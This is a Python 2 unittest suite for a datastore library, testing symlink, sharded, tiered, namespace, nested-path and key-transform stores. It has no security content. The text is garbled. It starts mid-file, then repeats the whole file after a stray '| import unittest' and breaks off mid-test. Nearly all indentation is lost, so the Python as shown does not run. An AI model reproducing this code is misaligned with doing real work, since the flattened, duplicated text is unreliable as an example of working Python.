self.assertEqual(sds.get(a), 3)
self.assertEqual(sds.get(b), 3)
self.assertEqual(sds.get(b), sds.get(a))
sds.delete(b)
self.assertEqual(sds.get(a), 3)
self.assertEqual(sds.get(b), None)
self.assertNotEqual(sds.get(b), sds.get(a))
def test_symlink_internals(self):
from ..basic import SymlinkDatastore
dds = DictDatastore()
sds = SymlinkDatastore(dds)
a = Key('/A')
b = Key('/B')
c = Key('/C')
d = Key('/D')
lva = sds._link_value_for_key(a)
lvb = sds._link_value_for_key(b)
lvc = sds._link_value_for_key(c)
lvd = sds._link_value_for_key(d)
# helper to check queries
sds_query = lambda: list(sds.query(Query(Key('/'))))
dds_query = lambda: list(dds.query(Query(Key('/'))))
# ensure _link_value_for_key and _link_for_value work
self.assertEqual(lva, str(a.child(sds.sentinel)))
self.assertEqual(a, sds._link_for_value(lva))
# adding a value should work like usual
sds.put(a, 1)
self.assertEqual(sds.get(a), 1)
self.assertEqual(sds.get(b), None)
self.assertNotEqual(sds.get(b), sds.get(a))
self.assertEqual(dds.get(a), 1)
self.assertEqual(dds.get(b), None)
self.assertEqual(sds_query(), [1])
self.assertEqual(dds_query(), [1])
# _follow_link(sds._link_value_for_key(a)) should == get(a)
self.assertEqual(sds._follow_link(lva), 1)
self.assertEqual(list(sds._follow_link_gen([lva])), [1])
# linking keys should work
sds.link(a, b)
self.assertEqual(sds.get(a), 1)
self.assertEqual(sds.get(b), 1)
self.assertEqual(sds.get(a), sds.get(b))
self.assertEqual(dds.get(a), 1)
self.assertEqual(dds.get(b), lva)
self.assertEqual(sds_query(), [1, 1])
self.assertEqual(dds_query(), [1, lva])
# changing link should affect source
sds.put(b, 2)
self.assertEqual(sds.get(a), 2)
self.assertEqual(sds.get(b), 2)
self.assertEqual(sds.get(a), sds.get(b))
self.assertEqual(dds.get(a), 2)
self.assertEqual(dds.get(b), lva)
self.assertEqual(sds_query(), [2, 2])
self.assertEqual(dds_query(), [2, lva])
# deleting source should affect link
sds.delete(a)
self.assertEqual(sds.get(a), None)
self.assertEqual(sds.get(b), None)
self.assertEqual(sds.get(b), sds.get(a))
self.assertEqual(dds.get(a), None)
self.assertEqual(dds.get(b), lva)
self.assertEqual(sds_query(), [None])
self.assertEqual(dds_query(), [lva])
# putting back source should yield working link
sds.put(a, 3)
self.assertEqual(sds.get(a), 3)
self.assertEqual(sds.get(b), 3)
self.assertEqual(sds.get(b), sds.get(a))
self.assertEqual(dds.get(a), 3)
self.assertEqual(dds.get(b), lva)
self.assertEqual(sds_query(), [3, 3])
self.assertEqual(dds_query(), [3, lva])
# deleting link should not affect source
sds.delete(b)
self.assertEqual(sds.get(a), 3)
self.assertEqual(sds.get(b), None)
self.assertNotEqual(sds.get(b), sds.get(a))
self.assertEqual(dds.get(a), 3)
self.assertEqual(dds.get(b), None)
self.assertEqual(sds_query(), [3])
self.assertEqual(dds_query(), [3])
# linking should bring back to normal
sds.link(a, b)
self.assertEqual(sds.get(a), 3)
self.assertEqual(sds.get(b), 3)
self.assertEqual(sds.get(b), sds.get(a))
self.assertEqual(dds.get(a), 3)
self.assertEqual(dds.get(b), lva)
self.assertEqual(sds_query(), [3, 3])
self.assertEqual(dds_query(), [3, lva])
# Adding another link should not affect things.
sds.link(a, c)
self.assertEqual(sds.get(a), 3)
self.assertEqual(sds.get(b), 3)
self.assertEqual(sds.get(c), 3)
self.assertEqual(sds.get(a), sds.get(b))
self.assertEqual(sds.get(a), sds.get(c))
self.assertEqual(dds.get(a), 3)
self.assertEqual(dds.get(b), lva)
self.assertEqual(dds.get(c), lva)
self.assertEqual(sds_query(), [3, 3, 3])
self.assertEqual(dds_query(), [3, lva, lva])
# linking should be transitive
sds.link(b, c)
sds.link(c, d)
self.assertEqual(sds.get(a), 3)
self.assertEqual(sds.get(b), 3)
self.assertEqual(sds.get(c), 3)
self.assertEqual(sds.get(d), 3)
self.assertEqual(sds.get(a), sds.get(b))
self.assertEqual(sds.get(a), sds.get(c))
self.assertEqual(sds.get(a), sds.get(d))
self.assertEqual(dds.get(a), 3)
self.assertEqual(dds.get(b), lva)
self.assertEqual(dds.get(c), lvb)
self.assertEqual(dds.get(d), lvc)
self.assertEqual(sds_query(), [3, 3, 3, 3])
self.assertEqual(set(dds_query()), set([3, lva, lvb, lvc]))
self.assertRaises(AssertionError, sds.link, d, a)
def test_symlink_recursive(self):
from ..basic import SymlinkDatastore
dds = DictDatastore()
sds1 = SymlinkDatastore(dds)
sds2 = SymlinkDatastore(sds1)
a = Key('/A')
b = Key('/B')
sds2.put(a, 1)
self.assertEqual(sds2.get(a), 1)
self.assertEqual(sds2.get(b), None)
self.assertNotEqual(sds2.get(b), sds2.get(a))
sds2.link(a, b)
self.assertEqual(sds2.get(a), 1)
self.assertEqual(sds2.get(b), 1)
self.assertEqual(sds2.get(a), sds2.get(b))
self.assertEqual(sds1.get(a), sds1.get(b))
sds2.link(a, b)
self.assertEqual(sds2.get(a), 1)
self.assertEqual(sds2.get(b), 1)
self.assertEqual(sds2.get(a), sds2.get(b))
self.assertEqual(sds1.get(a), sds1.get(b))
sds2.link(a, b)
self.assertEqual(sds2.get(a), 1)
self.assertEqual(sds2.get(b), 1)
self.assertEqual(sds2.get(a), sds2.get(b))
self.assertEqual(sds1.get(a), sds1.get(b))
sds2.put(b, 2)
self.assertEqual(sds2.get(a), 2)
self.assertEqual(sds2.get(b), 2)
self.assertEqual(sds2.get(a), sds2.get(b))
self.assertEqual(sds1.get(a), sds1.get(b))
sds2.delete(a)
self.assertEqual(sds2.get(a), None)
self.assertEqual(sds2.get(b), None)
self.assertEqual(sds2.get(b), sds2.get(a))
sds2.put(a, 3)
self.assertEqual(sds2.get(a), 3)
self.assertEqual(sds2.get(b), 3)
self.assertEqual(sds2.get(b), sds2.get(a))
sds2.delete(b)
self.assertEqual(sds2.get(a), 3)
self.assertEqual(sds2.get(b), None)
self.assertNotEqual(sds2.get(b), sds2.get(a))
class TestDirectoryDatastore(TestDatastore):
def test_simple(self):
from ..basic import DirectoryDatastore
s1 = DirectoryDatastore(DictDatastore())
s2 = DirectoryDatastore(DictDatastore())
self.subtest_simple([s1, s2])
class TestDatastoreCollection(TestDatastore):
def test_tiered(self):
from ..basic import TieredDatastore
s1 = DictDatastore()
s2 = DictDatastore()
s3 = DictDatastore()
ts = TieredDatastore([s1, s2, s3])
k1 = Key('1')
k2 = Key('2')
k3 = Key('3')
s1.put(k1, '1')
s2.put(k2, '2')
s3.put(k3, '3')
self.assertTrue(s1.contains(k1))
self.assertFalse(s2.contains(k1))
self.assertFalse(s3.contains(k1))
self.assertTrue(ts.contains(k1))
self.assertEqual(ts.get(k1), '1')
self.assertEqual(s1.get(k1), '1')
self.assertFalse(s2.contains(k1))
self.assertFalse(s3.contains(k1))
self.assertFalse(s1.contains(k2))
self.assertTrue(s2.contains(k2))
self.assertFalse(s3.contains(k2))
self.assertTrue(ts.contains(k2))
self.assertEqual(s2.get(k2), '2')
self.assertFalse(s1.contains(k2))
self.assertFalse(s3.contains(k2))
self.assertEqual(ts.get(k2), '2')
self.assertEqual(s1.get(k2), '2')
self.assertEqual(s2.get(k2), '2')
self.assertFalse(s3.contains(k2))
self.assertFalse(s1.contains(k3))
self.assertFalse(s2.contains(k3))
self.assertTrue(s3.contains(k3))
self.assertTrue(ts.contains(k3))
self.assertEqual(s3.get(k3), '3')
self.assertFalse(s1.contains(k3))
self.assertFalse(s2.contains(k3))
self.assertEqual(ts.get(k3), '3')
self.assertEqual(s1.get(k3), '3')
self.assertEqual(s2.get(k3), '3')
self.assertEqual(s3.get(k3), '3')
ts.delete(k1)
ts.delete(k2)
ts.delete(k3)
self.assertFalse(ts.contains(k1))
self.assertFalse(ts.contains(k2))
self.assertFalse(ts.contains(k3))
self.subtest_simple([ts])
def test_sharded(self, numelems=1000):
from ..basic import ShardedDatastore
s1 = DictDatastore()
s2 = DictDatastore()
s3 = DictDatastore()
s4 = DictDatastore()
s5 = DictDatastore()
stores = [s1, s2, s3, s4, s5]
hash = lambda key: int(key.name) * len(stores) / numelems
sharded = ShardedDatastore(stores, shardingfn=hash)
sumlens = lambda stores: sum(map(lambda s: len(s), stores))
def checkFor(key, value, sharded, shard=None):
correct_shard = sharded._stores[hash(key) % len(sharded._stores)]
for s in sharded._stores:
if shard and s == shard:
self.assertTrue(s.contains(key))
self.assertEqual(s.get(key), value)
else:
self.assertFalse(s.contains(key))
if correct_shard == shard:
self.assertTrue(sharded.contains(key))
self.assertEqual(sharded.get(key), value)
else:
self.assertFalse(sharded.contains(key))
self.assertEqual(sumlens(stores), 0)
# test all correct.
for value in range(0, numelems):
key = Key('/fdasfdfdsafdsafdsa/%d' % value)
shard = stores[hash(key) % len(stores)]
checkFor(key, value, sharded)
shard.put(key, value)
checkFor(key, value, sharded, shard)
self.assertEqual(sumlens(stores), numelems)
    # ensure it's in the same spots.
    for value in range(0, numelems):
key = Key('/fdasfdfdsafdsafdsa/%d' % value)
shard = stores[hash(key) % len(stores)]
checkFor(key, value, sharded, shard)
shard.put(key, value)
checkFor(key, value, sharded, shard)
self.assertEqual(sumlens(stores), numelems)
    # ensure it's in the same spots.
for value in range(0, numelems):
key = Key('/fdasfdfdsafdsafdsa/%d' % value)
shard = stores[hash(key) % len(stores)]
checkFor(key, value, sharded, shard)
sharded.put(key, value)
checkFor(key, value, sharded, shard)
self.assertEqual(sumlens(stores), numelems)
    # ensure it's in the same spots.
for value in range(0, numelems):
key = Key('/fdasfdfdsafdsafdsa/%d' % value)
shard = stores[hash(key) % len(stores)]
checkFor(key, value, sharded, shard)
if value % 2 == 0:
shard.delete(key)
else:
sharded.delete(key)
checkFor(key, value, sharded)
self.assertEqual(sumlens(stores), 0)
# try out adding it to the wrong shards.
for value in range(0, numelems):
key = Key('/fdasfdfdsafdsafdsa/%d' % value)
incorrect_shard = stores[(hash(key) + 1) % len(stores)]
checkFor(key, value, sharded)
incorrect_shard.put(key, value)
checkFor(key, value, sharded, incorrect_shard)
self.assertEqual(sumlens(stores), numelems)
    # ensure it's in the same spots.
for value in range(0, numelems):
key = Key('/fdasfdfdsafdsafdsa/%d' % value)
incorrect_shard = stores[(hash(key) + 1) % len(stores)]
checkFor(key, value, sharded, incorrect_shard)
incorrect_shard.put(key, value)
checkFor(key, value, sharded, incorrect_shard)
self.assertEqual(sumlens(stores), numelems)
    # this won't do anything
for value in range(0, numelems):
key = Key('/fdasfdfdsafdsafdsa/%d' % value)
incorrect_shard = stores[(hash(key) + 1) % len(stores)]
checkFor(key, value, sharded, incorrect_shard)
sharded.delete(key)
checkFor(key, value, sharded, incorrect_shard)
self.assertEqual(sumlens(stores), numelems)
# this will place it correctly.
for value in range(0, numelems):
key = Key('/fdasfdfdsafdsafdsa/%d' % value)
incorrect_shard = stores[(hash(key) + 1) % len(stores)]
correct_shard = stores[(hash(key)) % len(stores)]
checkFor(key, value, sharded, incorrect_shard)
sharded.put(key, value)
incorrect_shard.delete(key)
checkFor(key, value, sharded, correct_shard)
self.assertEqual(sumlens(stores), numelems)
# this will place it correctly.
for value in range(0, numelems):
key = Key('/fdasfdfdsafdsafdsa/%d' % value)
correct_shard = stores[(hash(key)) % len(stores)]
checkFor(key, value, sharded, correct_shard)
sharded.delete(key)
checkFor(key, value, sharded)
self.assertEqual(sumlens(stores), 0)
self.subtest_simple([sharded])
if __name__ == '__main__':
unittest.main()
| import unittest
import logging
from ..basic import DictDatastore
from ..key import Key
from ..query import Query
class TestDatastore(unittest.TestCase):
def subtest_simple(self, stores, numelems=1000):
def checkLength(len):
try:
for sn in stores:
self.assertEqual(len(sn), numelems)
except TypeError, e:
pass
self.assertTrue(len(stores) > 0)
pkey = Key('/dfadasfdsafdas/')
checkLength(0)
# ensure removing non-existent keys is ok.
for value in range(0, numelems):
key = pkey.child(value)
for sn in stores:
self.assertFalse(sn.contains(key))
sn.delete(key)
self.assertFalse(sn.contains(key))
checkLength(0)
# insert numelems elems
for value in range(0, numelems):
key = pkey.child(value)
for sn in stores:
self.assertFalse(sn.contains(key))
sn.put(key, value)
self.assertTrue(sn.contains(key))
self.assertEqual(sn.get(key), value)
# reassure they're all there.
checkLength(numelems)
for value in range(0, numelems):
key = pkey.child(value)
for sn in stores:
self.assertTrue(sn.contains(key))
self.assertEqual(sn.get(key), value)
checkLength(numelems)
k = pkey
n = int(numelems)
allitems = list(range(0, n))
def test_query(query, slice):
for sn in stores:
try:
contents = list(sn.query(Query(pkey)))
expected = contents[slice]
result = list(sn.query(query))
# make sure everything is there.
self.assertTrue(len(contents) == len(allitems),\
'%s == %s' % (str(contents), str(allitems)))
self.assertTrue(all([val in contents for val in allitems]))
self.assertTrue(len(result) == len(expected),\
'%s == %s' % (str(result), str(expected)))
self.assertTrue(all([val in result for val in expected]))
#TODO: should order be preserved?
# self.assertEqual(result, expected)
except NotImplementedError:
print 'WARNING: %s does not implement query.' % sn
test_query(Query(k), slice(0, n))
test_query(Query(k, limit=n), slice(0, n))
test_query(Query(k, limit=n/2), slice(0, n/2))
test_query(Query(k, offset=n/2), slice(n/2, n))
test_query(Query(k, offset=n/3, limit=n/3), slice(n/3, 2*(n/3)))
del k
del n
# change numelems elems
for value in range(0, numelems):
key = pkey.child(value)
for sn in stores:
self.assertTrue(sn.contains(key))
sn.put(key, value + 1)
self.assertTrue(sn.contains(key))
self.assertNotEqual(value, sn.get(key))
self.assertEqual(value + 1, sn.get(key))
checkLength(numelems)
# remove numelems elems
for value in range(0, numelems):
key = pkey.child(value)
for sn in stores:
self.assertTrue(sn.contains(key))
sn.delete(key)
self.assertFalse(sn.contains(key))
checkLength(0)
class TestNullDatastore(unittest.TestCase):
def test_null(self):
from ..basic import NullDatastore
s = NullDatastore()
for c in range(1, 20):
c = str(c)
k = Key(c)
self.assertFalse(s.contains(k))
self.assertEqual(s.get(k), None)
s.put(k, c)
self.assertFalse(s.contains(k))
self.assertEqual(s.get(k), None)
for item in s.query(Query(Key('/'))):
raise Exception('Should not have found anything.')
class TestDictionaryDatastore(TestDatastore):
def test_dictionary(self):
s1 = DictDatastore()
s2 = DictDatastore()
s3 = DictDatastore()
stores = [s1, s2, s3]
self.subtest_simple(stores)
class TestCacheShimDatastore(TestDatastore):
def test_simple(self):
from ..basic import CacheShimDatastore
from ..basic import NullDatastore
class NullMinusQueryDatastore(NullDatastore):
def query(self, query):
raise NotImplementedError
# make sure the cache is used
s1 = CacheShimDatastore(NullMinusQueryDatastore(), cache=DictDatastore())
    # make sure the cache is not relied upon
s2 = CacheShimDatastore(DictDatastore(), cache=NullDatastore())
# make sure the cache works in tandem
s3 = CacheShimDatastore(DictDatastore(), cache=DictDatastore())
self.subtest_simple([s1, s2, s3])
class TestLoggingDatastore(TestDatastore):
def test_simple(self):
from ..basic import LoggingDatastore
class NullLogger(logging.getLoggerClass()):
def debug(self, *args, **kwargs): pass
def info(self, *args, **kwargs): pass
def warning(self, *args, **kwargs): pass
def error(self, *args, **kwargs): pass
def critical(self, *args, **kwargs): pass
s1 = LoggingDatastore(DictDatastore(), logger=NullLogger('null'))
s2 = LoggingDatastore(DictDatastore())
self.subtest_simple([s1, s2])
class TestKeyTransformDatastore(TestDatastore):
def test_simple(self):
from ..basic import KeyTransformDatastore
s1 = KeyTransformDatastore(DictDatastore())
s2 = KeyTransformDatastore(DictDatastore())
s3 = KeyTransformDatastore(DictDatastore())
stores = [s1, s2, s3]
self.subtest_simple(stores)
def test_reverse_transform(self):
from ..basic import KeyTransformDatastore
def transform(key):
return key.reverse
ds = DictDatastore()
kt = KeyTransformDatastore(ds, keytransform=transform)
k1 = Key('/a/b/c')
k2 = Key('/c/b/a')
self.assertFalse(ds.contains(k1))
self.assertFalse(ds.contains(k2))
self.assertFalse(kt.contains(k1))
self.assertFalse(kt.contains(k2))
ds.put(k1, 'abc')
self.assertEqual(ds.get(k1), 'abc')
self.assertFalse(ds.contains(k2))
self.assertFalse(kt.contains(k1))
self.assertEqual(kt.get(k2), 'abc')
kt.put(k1, 'abc')
self.assertEqual(ds.get(k1), 'abc')
self.assertEqual(ds.get(k2), 'abc')
self.assertEqual(kt.get(k1), 'abc')
self.assertEqual(kt.get(k2), 'abc')
ds.delete(k1)
self.assertFalse(ds.contains(k1))
self.assertEqual(ds.get(k2), 'abc')
self.assertEqual(kt.get(k1), 'abc')
self.assertFalse(kt.contains(k2))
kt.delete(k1)
self.assertFalse(ds.contains(k1))
self.assertFalse(ds.contains(k2))
self.assertFalse(kt.contains(k1))
self.assertFalse(kt.contains(k2))
def test_lowercase_transform(self):
from ..basic import KeyTransformDatastore
def transform(key):
return Key(str(key).lower())
ds = DictDatastore()
lds = KeyTransformDatastore(ds, keytransform=transform)
k1 = Key('hello')
k2 = Key('HELLO')
k3 = Key('HeLlo')
ds.put(k1, 'world')
ds.put(k2, 'WORLD')
self.assertEqual(ds.get(k1), 'world')
self.assertEqual(ds.get(k2), 'WORLD')
self.assertFalse(ds.contains(k3))
self.assertEqual(lds.get(k1), 'world')
self.assertEqual(lds.get(k2), 'world')
self.assertEqual(lds.get(k3), 'world')
def test(key, val):
lds.put(key, val)
self.assertEqual(lds.get(k1), val)
self.assertEqual(lds.get(k2), val)
self.assertEqual(lds.get(k3), val)
test(k1, 'a')
test(k2, 'b')
test(k3, 'c')
class TestLowercaseKeyDatastore(TestDatastore):
def test_simple(self):
from ..basic import LowercaseKeyDatastore
s1 = LowercaseKeyDatastore(DictDatastore())
s2 = LowercaseKeyDatastore(DictDatastore())
s3 = LowercaseKeyDatastore(DictDatastore())
stores = [s1, s2, s3]
self.subtest_simple(stores)
def test_lowercase(self):
from ..basic import LowercaseKeyDatastore
ds = DictDatastore()
lds = LowercaseKeyDatastore(ds)
k1 = Key('hello')
k2 = Key('HELLO')
k3 = Key('HeLlo')
ds.put(k1, 'world')
ds.put(k2, 'WORLD')
self.assertEqual(ds.get(k1), 'world')
self.assertEqual(ds.get(k2), 'WORLD')
self.assertFalse(ds.contains(k3))
self.assertEqual(lds.get(k1), 'world')
self.assertEqual(lds.get(k2), 'world')
self.assertEqual(lds.get(k3), 'world')
def test(key, val):
lds.put(key, val)
self.assertEqual(lds.get(k1), val)
self.assertEqual(lds.get(k2), val)
self.assertEqual(lds.get(k3), val)
test(k1, 'a')
test(k2, 'b')
test(k3, 'c')
class TestNamespaceDatastore(TestDatastore):
def test_simple(self):
from ..basic import NamespaceDatastore
s1 = NamespaceDatastore(Key('a'), DictDatastore())
s2 = NamespaceDatastore(Key('b'), DictDatastore())
s3 = NamespaceDatastore(Key('c'), DictDatastore())
stores = [s1, s2, s3]
self.subtest_simple(stores)
def test_namespace(self):
from ..basic import NamespaceDatastore
k1 = Key('/c/d')
k2 = Key('/a/b')
k3 = Key('/a/b/c/d')
ds = DictDatastore()
nd = NamespaceDatastore(k2, ds)
ds.put(k1, 'cd')
ds.put(k3, 'abcd')
self.assertEqual(ds.get(k1), 'cd')
self.assertFalse(ds.contains(k2))
self.assertEqual(ds.get(k3), 'abcd')
self.assertEqual(nd.get(k1), 'abcd')
self.assertFalse(nd.contains(k2))
self.assertFalse(nd.contains(k3))
def test(key, val):
nd.put(key, val)
self.assertEqual(nd.get(key), val)
self.assertFalse(ds.contains(key))
self.assertFalse(nd.contains(k2.child(key)))
self.assertEqual(ds.get(k2.child(key)), val)
for i in range(0, 10):
test(Key(str(i)), 'val%d' % i)
class TestNestedPathDatastore(TestDatastore):
def test_simple(self):
from ..basic import NestedPathDatastore
s1 = NestedPathDatastore(DictDatastore())
s2 = NestedPathDatastore(DictDatastore(), depth=2)
s3 = NestedPathDatastore(DictDatastore(), length=2)
s4 = NestedPathDatastore(DictDatastore(), length=1, depth=2)
stores = [s1, s2, s3, s4]
self.subtest_simple(stores)
def test_nested_path(self):
from ..basic import NestedPathDatastore
nested_path = NestedPathDatastore.nestedPath
def test(depth, length, expected):
nested = nested_path('abcdefghijk', depth, length)
self.assertEqual(nested, expected)
test(3, 2, 'ab/cd/ef')
test(4, 2, 'ab/cd/ef/gh')
test(3, 4, 'abcd/efgh/ijk')
test(1, 4, 'abcd')
test(3, 10, 'abcdefghij/k')
def subtest_nested_path_ds(self, **kwargs):
from ..basic import NestedPathDatastore
k1 = kwargs.pop('k1')
k2 = kwargs.pop('k2')
k3 = kwargs.pop('k3')
k4 = kwargs.pop('k4')
ds = DictDatastore()
np = NestedPathDatastore(ds, **kwargs)
self.assertFalse(ds.contains(k1))
self.assertFalse(ds.contains(k2))
self.assertFalse(ds.contains(k3))
self.assertFalse(ds.contains(k4))
self.assertFalse(np.contains(k1))
self.assertFalse(np.contains(k2))
self.assertFalse(np.contains(k3))
self.assertFalse(np.contains(k4))
np.put(k1, k1)
np.put(k2, k2)
self.assertFalse(ds.contains(k1))
self.assertFalse(ds.contains(k2))
self.assertTrue(ds.contains(k3))
self.assertTrue(ds.contains(k4))
self.assertTrue(np.contains(k1))
self.assertTrue(np.contains(k2))
self.assertFalse(np.contains(k3))
self.assertFalse(np.contains(k4))
self.assertEqual(np.get(k1), k1)
self.assertEqual(np.get(k2), k2)
self.assertEqual(ds.get(k3), k1)
self.assertEqual(ds.get(k4), k2)
np.delete(k1)
np.delete(k2)
self.assertFalse(ds.contains(k1))
self.assertFalse(ds.contains(k2))
self.assertFalse(ds.contains(k3))
self.assertFalse(ds.contains(k4))
self.assertFalse(np.contains(k1))
self.assertFalse(np.contains(k2))
self.assertFalse(np.contains(k3))
self.assertFalse(np.contains(k4))
ds.put(k3, k1)
ds.put(k4, k2)
self.assertFalse(ds.contains(k1))
self.assertFalse(ds.contains(k2))
self.assertTrue(ds.contains(k3))
self.assertTrue(ds.contains(k4))
self.assertTrue(np.contains(k1))
self.assertTrue(np.contains(k2))
self.assertFalse(np.contains(k3))
self.assertFalse(np.contains(k4))
self.assertEqual(np.get(k1), k1)
self.assertEqual(np.get(k2), k2)
self.assertEqual(ds.get(k3), k1)
self.assertEqual(ds.get(k4), k2)
ds.delete(k3)
ds.delete(k4)
self.assertFalse(ds.contains(k1))
self.assertFalse(ds.contains(k2))
self.assertFalse(ds.contains(k3))
self.assertFalse(ds.contains(k4))
self.assertFalse(np.contains(k1))
self.assertFalse(np.contains(k2))
self.assertFalse(np.contains(k3))
self.assertFalse(np.contains(k4))
def test_3_2(self):
opts = {}
opts['k1'] = Key('/<KEY>')
opts['k2'] = Key('/<KEY>')
opts['k3'] = Key('/<KEY>')
opts['k4'] = Key('/<KEY>')
opts['depth'] = 3
opts['length'] = 2
self.subtest_nested_path_ds(**opts)
def test_5_3(self):
opts = {}
opts['k1'] = Key('/<KEY>')
opts['k2'] = Key('/<KEY>')
opts['k3'] = Key('/<KEY>')
opts['k4'] = Key('/<KEY>')
opts['depth'] = 5
opts['length'] = 3
self.subtest_nested_path_ds(**opts)
def test_keyfn(self):
opts = {}
opts['k1'] = Key('/<KEY>')
opts['k2'] = Key('/<KEY>')
opts['k3'] = Key('/kj/ih/gf/abcdefghijk')
opts['k4'] = Key('/<KEY>')
opts['depth'] = 3
opts['length'] = 2
opts['keyfn'] = lambda key: key.name[::-1]
self.subtest_nested_path_ds(**opts)
class TestSymlinkDatastore(TestDatastore):
def test_simple(self):
from ..basic import SymlinkDatastore
s1 = SymlinkDatastore(DictDatastore())
s2 = SymlinkDatastore(DictDatastore())
s3 = SymlinkDatastore(DictDatastore())
s4 = SymlinkDatastore(DictDatastore())
stores = [s1, s2, s3, s4]
self.subtest_simple(stores)
def test_symlink_basic(self):
from ..basic import SymlinkDatastore
dds = DictDatastore()
sds = SymlinkDatastore(dds)
a = Key('/A')
b = Key('/B')
sds.put(a, 1)
self.assertEqual(sds.get(a), 1)
self.assertEqual(sds.get(b), None)
self.assertNotEqual(sds.get(b), sds.get(a))
sds.link(a, b)
self.assertEqual(sds.get(a), 1)
self.assertEqual(sds.get(b), 1)
self.assertEqual(sds.get(a), sds.get(b))
sds.put(b, 2)
self.assertEqual(sds.get(a), 2)
self.assertEqual(sds.get(b), 2)
self.assertEqual(sds.get(a), sds.get(b))
sds.delete(a)
self.assertEqual(sds.get(a), None)
self.assertEqual(sds.get(b), None)
self.assertEqual(sds.get(b), sds.get(a))
sds.put(a, 3)
self.assertEqual(sds.get(a), 3)
self.assertEqual(sds.get(b), 3)
self.assertEqual(sds.get(b), sds.get(a))
sds.delete(b)
self.assertEqual(sds.get(a), 3)
self.assertEqual(sds.get(b), None)
self.assertNotEqual(sds.get(b), sds.get(a))
def test_symlink_internals(self):
from ..basic import SymlinkDatastore
dds = DictDatastore()
sds = SymlinkDatastore(dds)
a = Key('/A')
b = Key('/B')
c = Key('/C')
d = Key('/D')
lva = sds._link_value_for_key(a)
lvb = sds._link_value_for_key(b)
lvc = sds._link_value_for_key(c)
lvd = sds._link_value_for_key(d)
# helper to check queries
sds_query = lambda: list(sds.query(Query(Key('/'))))
dds_query = lambda: list(dds.query(Query(Key('/'))))
# ensure _link_value_for_key and _link_for_value work
self.assertEqual(lva, str(a.child(sds.sentinel)))
self.assertEqual(a, sds._link_for_value(lva))
# adding a value should work like usual
sds.put(a, 1)
self.assertEqual(sds.get(a), 1)
self.assertEqual(sds.get(b), None)
self.assertNotEqual(sds.get(b), sds.get(a))
self.assertEqual(dds.get(a), 1)
self.assertEqual(dds.get(b), None)
self.assertEqual(sds_query(), [1])
self.assertEqual(dds_query(), [1])
# _follow_link(sds._link_value_for_key(a)) should == get(a)
self.assertEqual(sds._follow_link(lva), 1)
self.assertEqual(list(sds._follow_link_gen([lva])), [1])
# linking keys should work
sds.link(a, b)
self.assertEqual(sds.get(a), 1)
self.assertEqual(sds.get(b), 1)
self.assertEqual(sds.get(a), sds.get(b))
self.assertEqual(dds.get(a), 1)
self.assertEqual(dds.get(b), lva)
self.assertEqual(sds_query(), [1, 1])
self.assertEqual(dds_query(), [1, lva])
# changing link should affect source
sds.put(b, 2)
self.assertEqual(sds.get(a), 2)
self.assertEqual(sds.get(b), 2)
self.assertEqual(sds.get(a), sds.get(b))
self.assertEqual(dds.get(a), 2)
self.assertEqual(dds.get(b), lva)
self.assertEqual(sds_query(), [2, 2])
self.assertEqual(dds_query(), [2, lva])
# deleting source should affect link
sds.delete(a)
self.assertEqual(sds.get(a), None)
self.assertEqual(sds.get(b), None)
self.assertEqual(sds.get(b), sds.get(a))
self.assertEqual(dds.get(a), None)
self.assertEqual(dds.get(b), lva)
self.assertEqual(sds_query(), [None])
self.assertEqual(dds_query(), [lva])
# putting back source should yield working link
sds.put(a, 3)
self.assertEqual(sds.get(a), 3)
self.assertEqual(sds.get(b), 3)
self.assertEqual(sds.get(b), sds.get(a))
self.assertEqual(dds.get(a), 3)
self.assertEqual(dds.get(b), lva)
self.assertEqual(sds_query(), [3, 3])
self.assertEqual(dds_query(), [3, lva])
# deleting link should not affect source
sds.delete(b)
self.assertEqual(sds.get(a), 3)
self.assertEqual(sds.get(b), None)
self.assertNotEqual(sds.get(b), sds.get(a))
self.assertEqual(dds.get(a), 3)
self.assertEqual(dds.get(b), None)
self.assertEqual(sds_query(), [3])
self.assertEqual(dds_query(), [3])
# linking should bring back to normal
sds.link(a, b)
self.assertEqual(sds.get(a), 3)
self.assertEqual(sds.get(b), 3)
self.assertEqual(sds.get(b), sds.get(a))
self.assertEqual(dds.get(a), 3)
self.assertEqual(dds.get(b), lva)
self.assertEqual(sds_query(), [3, 3])
self.assertEqual(dds_query(), [3, lva])
# Adding another link should not affect things.
sds.link(a, c)
self.assertEqual(sds.get(a), 3)
self.assertEqual(sds.get(b), 3)
self.assertEqual(sds.get(c), 3)
self.assertEqual(sds.get(a), sds.get(b))
self.assertEqual(sds.get(a), sds.get(c))
self.assertEqual(dds.get(a), 3)
self.assertEqual(dds.get(b), lva)
self.assertEqual(dds.get(c), lva)
self.assertEqual(sds_query(), [3, 3, 3])
self.assertEqual(dds_query(), [3, lva, lva])
# linking should be transitive
sds.link(b, c)
sds.link(c, d)
self.assertEqual(sds.get(a), 3)
self.assertEqual(sds.get(b), 3)
self.assertEqual(sds.get(c), 3)
self.assertEqual(sds.get(d), 3)
self.assertEqual(sds.get(a), sds.get(b))
self.assertEqual(sds.get(a), sds.get(c))
self.assertEqual(sds.get(a), sds.get(d))
self.assertEqual(dds.get(a), 3)
self.assertEqual(dds.get(b), lva)
self.assertEqual(dds.get(c), lvb)
self.assertEqual(dds.get(d), lvc)
self.assertEqual(sds_query(), [3, 3, 3, 3])
self.assertEqual(set(dds_query()), set([3, lva, lvb, lvc]))
self.assertRaises(AssertionError, sds.link, d, a)
def test_symlink_recursive(self):
from ..basic import SymlinkDatastore
dds = DictDatastore()
sds1 = SymlinkDatastore(dds)
sds2 = SymlinkDatastore(sds1)
a = Key('/A')
b = Key('/B')
sds2.put(a, 1)
self.assertEqual(sds2.get(a), 1)
self.assertEqual(sds2.get(b), None)
self.assertNotEqual(sds2.get(b), sds2.get(a))
sds2.link(a, b)
self.assertEqual(sds2.get(a), 1)
self.assertEqual(sds2.get(b), 1)
self.assertEqual(sds2.get(a), sds2.get(b))
self.assertEqual(sds1.get(a), sds1.get(b))
sds2.link(a, b)
self.assertEqual(sds2.get(a), 1)
self.assertEqual(sds2.get(b), 1)
self.assertEqual(sds2.get(a), sds2.get(b))
self.assertEqual(sds1.get(a), sds1.get(b))
sds2.link(a, b)
self.assertEqual(sds2.get(a), 1)
self.assertEqual(sds2.get(b), 1)
self.assertEqual(sds2.get(a), sds2.get(b))
self.assertEqual(sds1.get(a), sds1.get(b))
sds2.put(b, 2)
self.assertEqual(sds2.get(a), 2)
self.assertEqual(sds2.get(b), 2)
self.assertEqual(sds2.get(a), sds2.get(b))
self.assertEqual(sds1.get(a), sds1.get(b))
sds2.delete(a)
self.assertEqual(sds2.get(a), None)
self.assertEqual(sds2.get(b), None)
